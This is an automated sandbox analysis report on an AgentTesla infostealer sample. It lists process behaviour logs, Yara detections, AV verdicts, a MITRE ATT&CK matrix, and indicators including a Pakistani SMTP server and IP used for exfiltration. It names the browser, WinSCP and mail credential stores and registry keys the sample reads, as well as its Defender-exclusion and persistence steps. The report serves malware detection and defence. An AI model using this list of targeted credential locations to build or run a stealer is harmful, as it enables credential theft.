                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeQueries volume information: C:\Users\user\Desktop\P020241901.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeQueries volume information: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeQueries volume information: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\P020241901.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 14.2.VKkzqGUhsZwwm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.P020241901.exe.3799000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.P020241901.exe.375e5e0.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.P020241901.exe.375e5e0.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.P020241901.exe.3799000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.3234380229.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3234380229.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.3233407833.0000000002B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.3233407833.0000000002B3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.3230734954.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2002617637.000000000375E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3234380229.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.3233407833.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: P020241901.exe PID: 4204, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: P020241901.exe PID: 7180, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: VKkzqGUhsZwwm.exe PID: 7540, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Users\user\Desktop\P020241901.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\Desktop\P020241901.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 14.2.VKkzqGUhsZwwm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.P020241901.exe.3799000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.P020241901.exe.375e5e0.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.P020241901.exe.375e5e0.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.P020241901.exe.3799000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.3230734954.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2002617637.000000000375E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3234380229.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.3233407833.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: P020241901.exe PID: 4204, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: P020241901.exe PID: 7180, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: VKkzqGUhsZwwm.exe PID: 7540, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 14.2.VKkzqGUhsZwwm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.P020241901.exe.3799000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.P020241901.exe.375e5e0.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.P020241901.exe.375e5e0.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.P020241901.exe.3799000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.3234380229.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3234380229.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.3233407833.0000000002B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.3233407833.0000000002B3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.3230734954.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2002617637.000000000375E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3234380229.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.3233407833.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: P020241901.exe PID: 4204, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: P020241901.exe PID: 7180, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: VKkzqGUhsZwwm.exe PID: 7540, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		1
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		111
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      Input Capture                      		24
                      System Information Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		1
                      Non-Standard Port                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      Scheduled Task/Job                      		3
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		211
                      Security Software Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                      Software Packing                      		NTDS1
                      Process Discovery                      		Distributed Component Object Model1
                      Input Capture                      		11
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Timestomp                      		LSA Secrets141
                      Virtualization/Sandbox Evasion                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading                      		Cached Domain Credentials1
                      Application Window Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Masquerading                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                      Virtualization/Sandbox Evasion                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                      Process Injection                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1410986 Sample: P020241901.exe Startdate: 18/03/2024 Architecture: WINDOWS Score: 100 42 mail.cup.org.pk 2->42 44 _kerberos._tcp.dc._msdcs.cup.org.pk 2->44 48 Snort IDS alert for network traffic 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 10 other signatures 2->54 8 P020241901.exe 7 2->8         started        12 VKkzqGUhsZwwm.exe 5 2->12         started        signatures3 process4 file5 38 C:\Users\user\AppData\...\VKkzqGUhsZwwm.exe, PE32 8->38 dropped 40 C:\Users\user\AppData\Local\...\tmpF9C9.tmp, XML 8->40 dropped 56 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->56 58 Uses schtasks.exe or at.exe to add and modify task schedules 8->58 60 Adds a directory exclusion to Windows Defender 8->60 62 Injects a PE file into a foreign processes 8->62 14 P020241901.exe 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        64 Antivirus detection for dropped file 12->64 66 Multi AV Scanner detection for dropped file 12->66 68 Machine Learning detection for dropped file 12->68 24 VKkzqGUhsZwwm.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 46 mail.cup.org.pk 203.82.48.116, 49708, 49711, 587 NAYATEL-PKNayatelPvtLtdPK Pakistan 14->46 28 conhost.exe 18->28         started        30 WmiPrvSE.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        70 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 24->70 72 Tries to steal Mail credentials (via file / registry access) 24->72 74 Tries to harvest and steal browser information (history, passwords, etc) 24->74 36 conhost.exe 26->36         started        signatures9 process10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      P020241901.exe66%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      P020241901.exe100%AviraHEUR/AGEN.1306659
                      P020241901.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe100%AviraHEUR/AGEN.1306659
                      C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe66%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://mail.cup.org.pk0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.cup.org.pk
                      		203.82.48.116
                      		truetrue
                        		unknown
                        _kerberos._tcp.dc._msdcs.cup.org.pk
                        		unknown
                        		unknownfalse
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://account.dyn.com/P020241901.exe, 00000000.00000002.2002617637.000000000375E000.00000004.00000800.00020000.00000000.sdmp, VKkzqGUhsZwwm.exe, 0000000E.00000002.3230734954.0000000000431000.00000040.00000400.00020000.00000000.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameP020241901.exe, 00000000.00000002.2001137973.0000000002581000.00000004.00000800.00020000.00000000.sdmp, VKkzqGUhsZwwm.exe, 0000000A.00000002.2042466300.0000000002679000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://mail.cup.org.pkP020241901.exe, 00000009.00000002.3234380229.0000000002A58000.00000004.00000800.00020000.00000000.sdmp, VKkzqGUhsZwwm.exe, 0000000E.00000002.3233407833.0000000002B46000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              203.82.48.116
                              		mail.cup.org.pkPakistan
                              		23674NAYATEL-PKNayatelPvtLtdPKtrue

                              General Information

                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1410986
                              Start date and time:2024-03-18 14:31:27 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 7m 35s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:17
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:P020241901.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@19/15@2/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 174
                              • Number of non-executed functions: 10
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: P020241901.exe

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              14:32:11API Interceptor103x Sleep call for process: P020241901.exe modified
                              14:32:13API Interceptor34x Sleep call for process: powershell.exe modified
                              14:32:14Task SchedulerRun new task: VKkzqGUhsZwwm path: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe
                              14:32:16API Interceptor90x Sleep call for process: VKkzqGUhsZwwm.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              203.82.48.116SPO-2344564.exeGet hashmaliciousAgentTeslaBrowse

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                mail.cup.org.pkSPO-2344564.exeGet hashmaliciousAgentTeslaBrowse
                                • 203.82.48.116

                                ASNs

